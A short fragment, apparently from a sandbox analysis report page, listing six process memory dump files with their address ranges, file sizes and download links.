              • memory/5780-8581-0x0000000000400000-0x0000000000477000-memory.dmp

                Filesize

                476KB

                Download

              • memory/6884-14359-0x00007FF85C5C0000-0x00007FF85D081000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/6884-14375-0x00007FF85C5C0000-0x00007FF85D081000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/6884-14362-0x0000015872B70000-0x0000015872B92000-memory.dmp

                Filesize

                136KB

                Download

              • memory/6884-14361-0x0000015872B30000-0x0000015872B40000-memory.dmp

                Filesize

                64KB

                Download

              • memory/6884-14360-0x0000015872B30000-0x0000015872B40000-memory.dmp

                Filesize

                64KB

                Download